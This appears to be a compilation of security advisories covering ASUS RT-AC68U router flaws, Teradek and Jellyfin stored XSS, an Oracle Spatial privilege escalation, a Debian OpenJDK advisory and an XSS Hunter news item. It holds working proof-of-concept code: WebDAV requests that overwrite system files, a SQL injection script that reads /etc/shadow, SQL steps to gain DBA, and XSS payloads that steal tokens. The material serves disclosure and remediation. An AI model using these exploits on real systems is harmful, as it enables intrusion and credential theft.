Directory Traversal vulnerability in Cloud Disk in ASUS RT-AC68U router firmware version before 3.0.0.4.386.41634 allows remote attackers to write arbitrary files via improper sanitation on the target for COPY and MOVE operations.

Over the summer of my junior year, I decided to do some router pentesting. Embedded security always seemed very fun to me. I liked the idea of breaking things that are found in our everyday lives, and what better place to start than my router. I was also inspired by my friend @arinerron who had some success with his router previously.

I dumped the firmware and started analyzing the binaries in Ghidra. I also found a GitHub repository containing a modified version of the source which greatly helped with the reversing process.

**Thoughts**

In the end, I managed to find a pre-auth arbitrary file read vulnerability, which could be used to dump /etc/shadow. From here, this could be chained with an authenticated arbitrary file write vulnerability to achieve code execution.

A shodan search suggests that around 200 thousand routers online could be potentially vulnerable, although because some specialized configuration is required the actual number is probably a bit lower.

One thing I found interesting was how many of the vulnerabilities involved “off-by-slash” issues. For example, requests to /smb/* required authentication but not /smb. If anything, this shows the importance of paying attention to the details when performing code audits.

It was also cool how there was an exploitable SQL injection vulnerability in such a seemingly low-level target.

Even though the code quality wasn’t the highest - many of these vulnerabilities were not very well hidden - this was overall a pretty fun exercise in code-review.

**Timeline**

08/18/2020 - Vulnerability submitted to [email protected]  
08/18/2020 - Vendor response  
10/25/2020 - Beta firmware - official release “in one month”  
12/19/2020 - Additional correspondence  
01/18/2021 - 3.0.0.4.386.41634 released

**Writeup**

_This is an adapted version of the writeup that was sent to the ASUS security team._

This document summarizes the results of my pentesting against ASUS RT-AC68U on the latest firmware version 3.0.0.4.385_20632. These vulnerabilities range from simple denial of service, to a no-interaction unauthenticated remote code execution chain. Many of these likely apply to other similar router versions as well. I also discuss several solutions for remediation.

These were patched in version 3.0.0.4.386.41634.

Overall, I present the following vulnerabilities:

1.  No-interaction pre-authentication RCE chain
2.  No-interaction pre-authentication persistent DOS chain
3.  3 XSS vectors, two of which could chain to RCE
4.  2 temporary denial of service exploits

**Vulnerabilities**

Note that you will need to enable the lighttpd server by going to http://router.asus.com/cloud\_main.asp and enabling Cloud Disk.

Additionally, some of the exploits require the mounting of an external device.

**MOVE/COPY Priming**

No authentication file-write to /mnt/*. An attacker chain this with MOVE/COPY Off By Slash to remotely brick a router, for example, by overwriting /etc/shadow or other important configuration files.

**POC**

There are two relevant primitives - file creation and directory creation.

    fetch("/smb/js/jplayer", {
      "headers": {
        "destination": "https://domain.tld/RT-AC68U/customdir",
        "overwrite": "T",
      },
      "body": "",
      "method": "MOVE"
    });
    

_directory creation_

    fetch("/smb/control", {
      "headers": {
        "destination": "https://domain.tld/RT-AC68U/customdir/testfile",
        "overwrite": "T",
      },
      "body": "",
      "method": "MOVE"
    });
    

_file creation_

This allows an attacker to overwrite arbitrary contents under /mnt. Note that an attacker is able to create any file structure they desire with these primitives. However, while the file layout is attacker controlled, the content within the files is not.

**Analysis**

Improper sanitation on the source for COPY and MOVE operations allows an attacker to load preexisting files from the router, even without authentication.

**Mitigation**

1.  Ensure that con->physical.path starts with /mnt in the mod_webdav.so for HTTP_METHOD_MOVE and HTTP_METHOD_COPY.

**MOVE/COPY Clobbering**

Authenticated arbitrary file write to /*. Can escalate to RCE by overwriting executable files, for example /etc/zcip. Can also modify internal variables such as the router password by writing to /dev/nvram.

**POC**

Create a directory structure as such.

    /mnt
      /USB-NAME
        /path
          /etc
            passwd
    

Run the below JavaScript.

    fetch("/RT-AC68U/USB-NAME/path", { 
      "headers": {
        "overwrite": "T",
        "destination": "https://domain.tld/",
      },
      "body": "",
      "method": "COPY",
    });
    

This will overwrite /etc/passwd.

**Analysis**

Improper sanitation on the target for COPY and MOVE operations gives an attacker an arbitrary file-write primitive.

**Mitigation**

1.  Ensure that p->physical.path starts with /mnt in the mod_webdav.so for HTTP_METHOD_MOVE and HTTP_METHOD_COPY.

**MOVE/COPY Off By Slash**

No-authentication arbitrary file copying from /mnt/* to /*. Can combine with MOVE/COPY Priming to remotely brick a router, for example, by overwriting /etc/shadow or other important configuration files.

**POC**

Create a directory structure as such.

    /mnt
      /etc
        passwd
    

Run the below JavaScript.

    fetch("/RT-AC68U", { 
      "headers": {
        "overwrite": "T",
        "destination": "https://domain.tld/",
      },
      "body": "",
      "method": "COPY",
    });
    

**Analysis**

The authentication handler has an off-by-slash error, matching for /RT-AC68U/ instead of /RT-AC68U. Thus, it allows unauthenticated requests to /RT-AC68U to hit the endpoint (note that adding a slash results in a 401). This allows an attacker to perform a copy operation from /mnt to /, exploiting a similar vulnerability as in MOVE/COPY Clobbering. By creating a fake directory structure with MOVE/COPY Priming, these two vulnerabilities give an attacker a write-anywhere primitive.

**Mitigation**

1.  Ensure the authentication handler filters requests against /RT-AC68U instead of /RT-AC68U/.

**PROPFINDMEDIALIST SQL Injection**

No user-interaction arbitrary file-read. By reading /etc/shadow, an unauthorized remote attacker can disclose a hashed password. Cracking this offline gives the router password. Can be combined with MOVE/COPY Clobbering for a full no-interaction RCE chain.

**POC**

You will need to enable the Digital Media Server functionality.

Run the below javascript, for example in the dev console, while on the AiCloud page.

    (async() => {
    var author = "" + Math.random();
    var path = "/etc/shadow";
    var dId = Math.floor(100000 * Math.random()) + 10000
    var oId = Math.floor(100000 * Math.random()) + 10000
    var pId = Math.floor(100000 * Math.random()) + 10000
    var val = ("a' OR 1 ); INSERT INTO DETAILS (TITLE, ALBUM_ART, ARTIST, ID) VALUES ('a', '" + pId + "', '" + author + "', " + dId + "); -- ").split("'").join("%27")
    console.log(val.length)
    
    await fetch("/smb", {
      "headers": {
        "keyword": val,
        "mediatype": "1",
      },
      "body": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?><D:propfind xmlns:D=\"DAV:\"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>",
      "method": "PROPFINDMEDIALIST",
    });
    
    val = ("a' OR 1 ); INSERT INTO OBJECTS (PARENT_ID, OBJECT_ID, DETAIL_ID, CLASS) VALUES ('1$7', " + oId + ", " + dId + ", 'container.album.musicAlbum'); -- ").split("'").join("%27")
    console.log(val.length)
    
    
    await fetch("/smb", {
      "headers": {
    
        "keyword": val,
        "mediatype": "1",
      },
      "body": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?><D:propfind xmlns:D=\"DAV:\"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>",
      "method": "PROPFINDMEDIALIST",
    });
    
    val = ("a' OR 1 );  INSERT INTO ALBUM_ART (PATH, ID) VALUES ('" + path + "', " + pId + "); -- ").split("'").join("%27")
    console.log(val.length)
    
    
    await fetch("/smb", {
      "headers": {
        "keyword": val,
        "mediatype": "1",
      },
      "body": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?><D:propfind xmlns:D=\"DAV:\"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>",
      "method": "PROPFINDMEDIALIST",
    });
    
    await fetch("/smb", {
      "headers": {
        "classify": "album",
      },
      "body": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?><D:propfind xmlns:D=\"DAV:\"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>",
      "method": "GETMUSICCLASSIFICATION"
    }).then(a => a.text()).then(b => {
    var aidx = b.indexOf(author)
    var pay = b.substring(b.indexOf("<thumb_image>", aidx) + "<thumb_image>".length, b.indexOf("</thumb_image>", aidx))
    
    console.log(atob(pay))
    })
    })()
    

**Analysis**

        //- Avoid SQL injection!
        if( keyword!=NULL && strstr(keyword->ptr, "'")!=NULL) {      
          Cdbg(DBE, "keyword is invalid!");
          
        ...
        
        if(!buffer_is_empty(keyword)){      
          buffer_urldecode_path(keyword);
    

_mod\_webdav.c_

The check for SQL injection happens before the url decode. This allows an attacker to pass in a URL-encoded single quote, %27, bypassing any SQL injection mitigations. In addition, stacked queries are enabled allowing an attacker to easily chain statements. This can be used to create a fake album, which is ultimately triggered by the GETMUSICCLASSIFICATION method, passing a fake filepath to get_album_cover_image.

        char* album_cover_file = result2[1];
                      
        FILE* fp = fopen(album_cover_file, "rb");
    

_mod\_webdav.c_

The contents of this file pointer are then read into a buffer, and then passed directly back to the attacker.

**Mitigation**

1.  Perform the SQL injection check after bufer_urldecode_path.
2.  Sanity check on album_cover_file, for example strncmp(album_cover_file, "/mnt", 4)

Given a single valid share link, an attacker can disclose any other file.

**POC**

Create a file structure as shown (a single folder with files a.txt and b.txt).

    /mnt/XXX 
      a.txt
      b.txt
    

Create a sharelink for a.txt. Append /%2e%2e/b.txt to the sharelink.

Your final URL should look like https://domain.tld/AICLOUDXXXXXXX/a.txt/%2e%2e/b.txt. Curl the URL - curl -k https://domain.tld/AICLOUDXXXXXXX/a.txt/%2e%2e/b.txt - and note that b.txt gets downloaded.

**Analysis**

mod_aicloud_sharelink_parser URL decodes the path, but fails to filter out path traversals like /../ after decoding.

**Mitigation**

1.  Filter out /../ from AICLOUD paths

**picasa.html XSS**

With user-interaction account takeover - total file disclosure and chain with above to remote code execution.

**POC**

While logged in, visit /smb/css/service/picasa.html?v=%3C%2ftextarea%3E%3Cscript%3Ealert(%27XSS%27)%3C%2fscript%3E.jpg

**Analysis**

The abbreviated JS is shown below.

      var uploadfile_url = getUrlVars()["v"];
      ...
      var this_filename = decodeURIComponent( uploadfile_url
        .substr( uploadfile_url.lastIndexOf("/") + 1, uploadfile_url.length-1 ) );
      ...
      upload_html += '<textarea style="resize: none; width: 292px; height: 82px;" 
        autocomplete="off" id="title" name="title" class="x-form-textarea x-form-field 
        service_upload_field ' + className + '">' + this_filename + '</textarea>';
    

Note that the value of the v parameter is reflected directly into the HTML (after decoding). A malicious filename like </textarea><script>alert('XSS')</script> allows an attacker to inject scripts. This could be done silently from an attacker controlled webpage, giving an attacker access to the router as long as the user is logged in.

**Mitigation**

1.  Sanitize the value of this_filename before injecting into the HTML, as shown below.

    return mystring.replace(/&/g, "&amp;").replace(/>/g, "&gt;").replace(/</g, "&lt;").replace(/"/g, "&quot;");
    

2.  Exit on invalid characters in file name - blacklist <>.

**urlInfo XSS**

Same impact scenario as picasa.html XSS.

**POC**

While logged out, navigate to /RT-AC68U/zz%27onmouseover=a.hidden=true;alert(origin)%20id=a%20style=width:100vw;position:fixed;top:0;height:100vh;opacity:0.01%20a=

**Analysis**

The handler for urlInfo fails to escape single quotes.

              buffer_copy_string_len(out, CONST_STR_LEN("<input class='urlInfo' value='"));        
              buffer_append_string_buffer(out, con->url.rel_path);        
              buffer_append_string_len(out, CONST_STR_LEN("' type='hidden'>"));
    

_connections.c_

**Mitigation**

1.  Sanitize the urlInfo property. Escape single quotes, replacing them with the HTML entity &apos;

**openurl XSS**

Same impact scenario as picasa.html XSS.

**POC**

Navigate to /smb/..%2f'onload='alert(origin) while logged in\`.

**Analysis**

This injects the openurl property on body. The final rendered HTML is as such.

    <body openurl='/smb/../'onload='alert(origin)' fileview_only='1'></body>
    

**Mitigation**

1.  Sanitize the openurl property. Escape single quotes, replacing them with the HTML entity &apos;

**AINVITE POST Handler DOS**

No interaction/authentication denial of service.

**POC**

Run the below code in the developer console on the lighttpd webpage. This sends a POST request with body “junk” to /AINVITE.

    fetch("/AINVITE", {
      "body": "junk",
      "method": "POST"
    });
    

**Analysis**

The handler for post data looks as such.

    iVar1 = parse_postdata_from_chunkqueue(param_1,param_2,param_2->field_0x54,&local_6c);
    if ((iVar1 == 0) && (local_6c != (void *)0x0)) {
      action_value = (char *)get_url_param_ualue(local_6c,"action");
      iVar1 = strcmp(action_value,"register");
    

Note that if get_url_param_ualue(local_6c, "action"), which gets the form data parameter, returns a null value the subsequent call to strcmp will result in a NULL pointer dereference.

**Mitigation**

1.  Add a check for the return value of get_url_param_ualue(local_6c, "action") to see if it is NULL before passing into strcmp.

**/AINVIT DOS**

No interaction/authentication denial of service.

**POC**

Visit /AINVIT. This will crash the lighttpd instance.

**Analysis**

In the handler mod_aicloud_invite.so, the comparison logic looks as such.

    iVar1 = strncmp(*param_2->field_0x108,"/AINVITE",7);
    if (iVar1 == 0) {
      local_38 = strstr(*param_2->field_0x108,"/AINVITE");
      local_38 = local_38 + 1;
      if (local_38 == (char *)0x0) {
        param_2->field_0x80 = 400;
        param_2->field_0x48 = 1;
        ret_code = 2;
      }
    

Note that however, the length of “/AINVITE” is 8. Thus, if /AINVIT is sent, it’ll pass the strncmp comparison, while returning null for strstr. While there is a null check, the pointer is incremented by 1, making it worthless. This results in a null pointer dereference later.

**Mitigation**

1.  Perform the null check before incrementing the pointer.
2.  strncmp with a length of 8

CVE-2021-37317: ASUS RT-AC68U RCE

** UNSUPPORTED WHEN ASSIGNED ** Cross Site Scripting (XSS) vulnerability in Teradek Clip all firmware versions allows remote attackers to run arbitrary code via the Friendly Name field in System Information Settings. NOTE: Vedor states the product has reached End of Life and will not be receiving any firmware updates to address this issue.

**Vulnerability Research****Teradek Cross-Site Scripting Vulnerability Advisory****Multiple Teradek Devices Found Vulnerable to Authenticated Stored Cross-Site Scripting****By: _Tyler Butler_, _Apr 29, 2021_ | _3 min read_**

Back in May, I disclosed a series of cross-site scripting vulnerabilities in the Cube 305 video encoder, a legacy video encoder from vendor Teradek. Teradek is video solutions manufacturer that develops networked devices for broadcast, cinema & imaging applications. After working through initial vulnerability disclosure with Teradek customer support, they informed me that “based on the scope of work involved, the product management team has determined that this issue will not be fixed for the EOL products”. In this blog post, I’ll describe the disclosure timeline and vulnerability details. While they declined to address the vulnerability, Teradek was overall a supportive partner in the vulnerabiltiy disclosure process, providing consistent communication and even going out of their way to provide a detailed list of effected devices.

See the original vulnerability disclosure here

****Index****

*   Disclosure Timeline
*   About the Vendor
*   Vulnerability Details

****⏱ Disclosure Timeline****

I discover the vulnerability and open support ticket #128254 via support.teradek.com

12 May 2021

Teradek responds to initial report and requests additional information.

13 May 2021

Continuous communication between myself and Teradek support

14 May - Jul 15th 2021

Teradek indicates the product will be classified as EOL and the issue will not be addressed. Teradek support provides a full list of effected products so I can engage Mitre CVE team

16 Jul 2021

****💡 About the Vendor****

Teradek produces video encoding devices used by streamers and video professionals alike. According to their website, “Teradek designs and manufactures high performance video solutions for broadcast, cinema, and general imaging applications. From wireless monitoring, color correction, and lens control, to live streaming, SaaS solutions, and IP video distribution, Teradek technology is used around the world by professionals and amateurs alike to capture and share compelling content.” Some of their most popular products include the Bolt, a zero delay HDR solution; the Teradek Ace, a compact wireless video system; and the Serve Pro, a compact live streaming HD system for android and MacOS.

****💀 Vulnerability Details****

The Teradek Cube 305 and all the following Teradek devices are vulnearble to a stored cross-site scripting vulnerability via the Friendly Hostname field within the System Information Settings. Remote authenticated attackers can exploit this vulnerability by embedding malicious JavaScript payloads that execute in the context of victim browsers. The impact of this vulnerability is severe, as malicious code could be used to track victim browsers, steal cookies, or further exploit users.

1.  Bond (firmware releases in the 7.3.x range were the final releases)
2.  Bond II (firmware releases in the 7.3.x range were the final releases)
3.  Bond Pro (firmware releases in the 7.3.x range were the final releases)
4.  Brik (firmware releases in 7.2.x were final)
5.  Clip
6.  Cube (firmware releases in the 7.3.x range were the last releases)
7.  Cube Pro (firmware releases in the 7.3.x range were the final releases)
8.  Slice (1st generation; firmware releases in the 7.3.x range were the final releases)
9.  Sphere
10.  VidiU / VidiU Mini (firmware 3.0.8 was the final release)

****⚰️ Proof of Concept****

**Payload**: Services.Zeroconf.friendlyname=Cube+255+04834<svg/onload=alertxss!\>

    POST /cgi-bin/api.cgi HTTP/1.1
    Host: 172.16.1.1
    Content-Length: 415
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Origin: http://172.16.1.1
    Referer: http://172.16.1.1/index.cs
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: serenity-session=29328153
    Connection: close
    
    Services.Zeroconf.friendlyname=Cube+255+04834<svg/onload=alert`xss!`>&Services.Zeroconf.Bonjour.enable=1&Services.HTTP.port=80&Services.HTTP.ssl=disable&Services.DDNS.enable=0&Services.DDNS.system=dyndns%40dyndns.org&Services.DDNS.alias=&Services.DDNS.username=%3Csvg%2Fonload%3Dalert%60xss+3!%60%3E&Services.DDNS.password=&Services.DDNS.interval=60&save=Services&apply=Services&noredirect=%2Findex.cs%3Fpage%3Dnetwork.services&command=set 
    

**Sending Payload with BurpSuite**

**Entering Payload via Device Settings**

**Payload Execution**

CVE-2021-37374: Teradek Cross-Site Scripting Vulnerability Advisory

Oracle Database version 12.1.0.2 suffers from a privilege escalation vulnerability that achieves DBA access via the Spatial component.

Title: Oracle Database Privilege Escalation Through Oracle Spatial Component  
Product:                   Database  
Manufacturer:              Oracle  
Affected Version(s):       12.1.0.2  
Tested Version(s):         12cR1  
Risk Level:                High  
Solution Status:           Fixed in Oracle Critical Patch Update October 2021  
CVE Reference:             N/A, Backported in Oracle CPU OCT 2021  
Author of Advisory:        Emad Al-Mousa

Overview:

Privilege Escalation is a famous security vulnerability (explitation technique)..... attackers seek to compromoise IT systems for multiple objectives such as data exfiltration, cause outage,....etc.

*****************************************  
Vulnerability Details:

The following is a privilege escalation vulnerability where an attacker can escalate his/her account permissions to "DBA" role. DBA role in Oracle is a very powerfull role where the user can view & edit any data within the database, create database objects (tables,malcious code,....etc) and many other harmful activities. The vulnerability exists IF the database system has Oracle "Spatial" component is installed. This vulnerability existed in Oracle 12cR1 and backport fix was issued in October 2021.

To check if Oracle Spatial Component is installed, run the following SQL query as it will list ALL installed components within the database system:

SQL> select comp_name from dba_registry;

*****************************************  
Proof of Concept (PoC):

// I will create an account called ironman using SYS account, the account will be granted “create session” to connect to the database and “create any procedure”, and “execute any procedure” permissions:

sqlplus / as sysdba

SQL> create user ironman identified by iron_123;

SQL> grant create session to ironman;

SQL> grant create any procedure to ironman;

SQL> grant execute any procedure to ironman;

SQL> exit;

// I will now connect using the newly created account “ironman” using sql plus

sqlplus ironman/iron_123

SQL> show user

USER is “IRONMAN”

SQL> select * from session_roles;

no rows selected

SQL> create or replace  procedure  SPATIAL_CSW_ADMIN_USR.hulk  (SQL_TEXT  IN  VARCHAR2) as

    BEGIN

    EXECUTE IMMEDIATE (SQL_TEXT);

    END hulk;  
/

SQL> execute SPATIAL_CSW_ADMIN_USR.hulk('grant DATAPUMP_IMP_FULL_DATABASE to ironman');

SQL> select * from session_roles;

no rows selected

SQL> set role DATAPUMP_IMP_FULL_DATABASE;

// ironman account is escalated to the role DATAPUMP_IMP_FULL_DATABASE

SQL> select * from session_roles;

ROLE

——————————————————————————–

DATAPUMP_IMP_FULL_DATABASE

EXP_FULL_DATABASE

SELECT_CATALOG_ROLE

HS_ADMIN_SELECT_ROLE

HS_ADMIN_ROLE

HS_ADMIN_EXECUTE_ROLE

EXECUTE_CATALOG_ROLE

IMP_FULL_DATABASE

8 rows selected.

// the next escalation level is to DBA role !!

SQL> grant dba to ironman;

SQL> set role dba;

SQL> select * from session_roles;

ROLE

——————————————————————————–

DBA

SELECT_CATALOG_ROLE

HS_ADMIN_SELECT_ROLE

HS_ADMIN_ROLE

HS_ADMIN_EXECUTE_ROLE

EXECUTE_CATALOG_ROLE

DELETE_CATALOG_ROLE

EXP_FULL_DATABASE

Advertisements  
Report this ad

IMP_FULL_DATABASE

DATAPUMP_EXP_FULL_DATABASE

DATAPUMP_IMP_FULL_DATABASE

ROLE

——————————————————————————–

GATHER_SYSTEM_STATISTICS

SCHEDULER_ADMIN

XDBADMIN

XDB_SET_INVOKER

JAVA_ADMIN

JAVA_DEPLOY

WM_ADMIN_ROLE

CAPTURE_ADMIN

OPTIMIZER_PROCESSING_RATE

EM_EXPRESS_ALL

EM_EXPRESS_BASIC

22 rows selected.

--- Conclusion:

The account ironman has been successfully elevated  to the “DBA” role which is the highest database role in Oracle database system.

*****************************************  
- Defensive Techniques:

configure auditing to catch any privilege escalation attempts.  
review database account permissions on regular basis.  
ensure database accounts have strong passwords, and rotate passwords regularly if possible.  
perform VA (vulnerability assesment) scans on regular basis.  
pro-actively patch your systems and database systems.

*****************************************  
References:  
https://www.oracle.com/security-alerts/cpuoct2021.html  
https://databasesecurityninja.wordpress.com/2021/10/22/oracle-database-privilege-escalation-through-oracle-spatial-component/comment-page-1/

Credit:   
Security-In-Depth Contributors: Emad Al-Mousa

Oracle Database 12.1.0.2 Spatial Component Privilege Escalation

In Jellyfin 10.8.x through 10.8.3, the name of a collection is vulnerable to stored XSS. This allows an attacker to steal access tokens from the localStorage of the victim.

**usd-2022-0031 | Jellyfin 10.8.1 - Cross-Site Scripting**

**Advisory ID:** usd-2022-0031  
**Product:** Jellyfin  
**Affected Version:** 10.8.1  
**Vulnerability Type:** CWE-79  
**Security Risk:** Critical  
**Vendor URL:** https://jellyfin.org  
**Vendor Status:** fixed  
**CVE number:** CVE-2023-23635

**Description**

A stored XSS in Jellyfin 10.8.1 allows an remote attacker to inject JavaScript into the name of a collection to perform a Cross-Site Scripting (XSS) attack.  
Because session tokens are stored in the localStorage, the attacker can extract them via javascript.

**Proof of Concept**

The following screenshot shows how an attacker can create a malicious collection.

  
The injected JavaScript code is executed in the user's browser, if a user (e.g. admin) visits the _collections_ page.

  
If you want to do some more interesting stuff with this vulnerability like taking over the admin account, you can use the following payload to read the access tokens from the localStorage.

"><img src=/X onerror=alert(localStorage.getItem("jellyfin\_credentials"))>

Getting the access token and device id allows you to rebuild the request for the _Quick Connect_ Feature.

This feature allows users to login using a PIN. The following request sets a PIN.

POST /QuickConnect/Authorize?Code=111111 HTTP/1.1  
Host: localhost:8096  
User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101 Firefox/102.0  
Accept: \*/\*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Emby-Authorization: MediaBrowser Client="Jellyfin Web", Device="Firefox", DeviceId="TW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0OyBydjoxMDAuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8xMDAuMHwxNjU2NzU0NTEwMjcz", Version="10.8.1", Token="7bd97aae0924484884d7d13a74e9517c"  
Origin: \[http://localhost:8096\]()  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Connection: close  
Cookie: sfcsrftoken=S82egH1Csl8FsxnMPQ6NGzXCWL3tiI8tNUvfsNyXnAVoGGthaUjsjrWesdhvu9Gc  
Content-Length: 0

**Fix**

It is recommended to treat all input on the website as potentially dangerous.  
Hence, all output that is dynamically generated based on user-controlled data should be encoded according to its context.  
The majority of programming languages support standard procedures for encoding meta characters.

**References**

*   https://owasp.org/www-community/attacks/xss/
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23635 

**Timeline**

*   **2022-07-18**: First contact request via security@jellyfin.org
*   **2022-08-02**: Vulnerability details submitted
*   **2022-08-16**: Fixed by Vendor
*   **2023-01-16:** Requested CVE assigned
*   **2023-01-19**: The advisory is published

**Credits**

This security vulnerability was found by Christian Pöschl of usd AG.

CVE-2023-23635: Security Advisory usd- 2022-0031 | usd HeroLab

In Jellyfin 10.8.x through 10.8.3, the name of a playlist is vulnerable to stored XSS. This allows an attacker to steal access tokens from the localStorage of the victim.

**usd-2022-0030 | Jellyfin 10.8.1 - Cross-Site Scripting**

**Advisory ID:** usd-2022-0030  
**Product:** Jellyfin  
**Affected Version:** 10.8.1  
**Vulnerability Type:** Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)  
**Security Risk:** Critical  
**Vendor URL:** https://jellyfin.org  
**Vendor acknowledged vulnerability:** Yes  
**Vendor Status:** fixed  
**CVE number:** CVE-2023-23636

**Description**

The playlist name in Jellyfin 10.8.1 is vulnerable to a stored XSS which allows a low privileged user to steal access tokens from high privileged users.  
The injected code is triggered everytime a user visits the playlist page. Since access tokens are stored in the **localStorage** an attacker is able to take over accounts by reading their values.

**Proof of Concept**

The following screenshot shows the executed JavaScript payload in the victim's browser.

The following request creates a payload with injected _name_.

POST /Playlists?Name=%22%3E%3Cimg%20src%3D%2FX%20onerror%3Dalert(document.domain)%3E&Ids=0358e400bf19a370e7f2e4e69f2af64d&userId=e9239683c3384717810a900f1c2c7eb5 HTTP/1.1  
Host: localhost:8096  
Content-Length: 0  
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"  
accept: application/json  
Content-Type: application/json  
\[...\]

**Fix**

It is recommended to treat all input on the website as potentially dangerous.  
Hence, all output that is dynamically generated based on user-controlled data should be encoded according to its context.  
The majority of programming languages support standard procedures for encoding meta characters.

**References**

*   https://owasp.org/www-community/attacks/xss/
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23636 

**Timeline**

*   **2022-07-18:** First contact request via security@jellyfin.org
*   **2022-08-02:** Vulnerability details submitted
*   **2022-08-16:** Fixed by Vendor
*   **2023-01-16:** Requested CVE assigned
*   **2023-01-19**: The advisory is published

**Credits**

This security vulnerability was found by Christian Pöschl of usd AG.

CVE-2023-23636: Security Advisory usd-2022-0030 | usd HeroLab

Debian Linux Security Advisory 5335-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in denial of service or spoofing.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5335-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
February 01, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openjdk-17  
CVE ID         : CVE-2022-21618 CVE-2022-21619 CVE-2022-21624 CVE-2022-21628  
                 CVE-2022-39399 CVE-2023-21835 CVE-2023-21843

Several vulnerabilities have been discovered in the OpenJDK Java runtime,  
which may result in denial of service or spoofing.

For the stable distribution (bullseye), these problems have been fixed in  
version 17.0.6+10-1~deb11u1.

We recommend that you upgrade your openjdk-17 packages.

For the detailed security status of openjdk-17 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openjdk-17

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmParr8ACgkQEMKTtsN8  
TjaUew/9Fpsfn3GMMnCaheFv/IAODAauovmI71hUQpohxEX5eL17mLWX4s5L0qtu  
HHHlexE4EtWNRk2KUtsm5oroX95mseqNhXObvX7dho0pGn8eM0N9FuJ3eXdWMxxP  
MW8Q+MADyDHuWB5/Fb6a16NpCIqzeUgS2CEMaM+6BCp2O2Mz+O0EfH/3MC9GW3z7  
sP+IUD3nm0+03J00CgZfEvRN2g1NElIerCQiSMeNC7T21V4Lz7MnVNCV1jyTvdm9  
IV5HXuVdEjeSbdC2sJbnF3geGDV5cLBcY7Il8JbcT/ADCUGkxM8wnilsiRrDj+e0  
gTuturVqUxLvjjxjpMNdLZrmv3WUMuBgFNkVpriDGXEjalsCX2yfYVQUyNGUZHCC  
o0VEuPjEKFQh8anUiugwF4ZqMfosbZcbrT7eTWFsJlAMTiBi+k8Qs3K9q9XeIW8Y  
LnMCiaTLzC+3ZL65J0r2E+CiGrie/DGaWxLaXVxt2/Qux3MOf5mKoVZSHEl7jKey  
sIIZoav9p8/Rj/3DmMLJi+visUH/aptKzbgXEAIAjSMs9pXtgu4PYZ5faAecRC9K  
G6edx+RrdXMS7nuuzH+rlCkGRJ9oszyHlcpV0cFI4/ss5ljY9rtrw7cs3qN2kZz5  
RrtXMAQc0xXLTZJTozNsqf7ael4mWfUoc809BMRobJ1m1bBTWTA=Pibq  
-----END PGP SIGNATURE-----

Debian Security Advisory 5335-1

Popular hacking aid resurrected following end-of-life announcement

Popular hacking aid resurrected following end-of-life announcement

XSS Hunter now has a home at Truffle Security, which has launched a new version of the tool after its original creator declared that he will be deprecating it in February.

XSS Hunter is a popular open source tool for identifying cross-site scripting (XSS) bugs in websites. An online version was previously maintained by its creator Mandatory (Matthew Bryant).

The new version, hosted on Truffle Security’s domain, is an open source fork of the original code with new features and enhanced security.

**Privacy concerns**

XSS is a very common vulnerability, accounting for 23% of bug reports submitted to bug bounty platform HackerOne, for example.

“The most popular tool for looking for XSS aside from manual testing is XSSHunter,” Dylan Ayrey, co-founder of Truffle Security, told The Daily Swig. “It’s an extremely valuable tool to the community, but it also had risks.”

Many users of XSS Hunter would accidentally send sensitive data to the platform and possibly cause data leakage. Ayrey had previously stumbled on 50,000 Google user records while working with the old XSS Hunter, which became the topic of a talk he gave at Black Hat 2022.

“As long as Mandatory was in charge of the service, I wasn’t concerned with what the platform might do with that data collected,” Ayrey said.

“But we were concerned after the EOL \[end of life\] was announced, another tool might have come along to replace it with operators that may have had different intentions with the data collected.”

Read more of the latest news about web hacking tools

The new XSS Hunter tool blurs screenshots captured by the platform to protect sensitive information rendered by the XSS payload. It has also removed support for full DOM capture and enforces Google SSO login to improve account security.

Regarding the deprecation of the old service, Mandatory told The Daily Swig that he had become “increasingly uncomfortable with the amount of vulnerability information stored in the service.

“Ideally I’d like to be storing zero vulnerability information for XSS hunter users, which this deprecation will achieve,” he said.

Mandatory described Truffle Security’s fork as “a step in the right direction” and said: “I think the fact that Truffle Security is starting out with an eye on balancing privacy and bug bounty research interests is a good sign.”

**New features**

Truffle Security has added support for detecting other kinds of vulnerabilities, including cross-origin resource sharing (CORS) misconfigurations that would allow external sites to view and extract data from internal domains. CORS vulnerabilities can be especially damaging, as Truffle Security recently discovered while investigating different internal corporate networks.

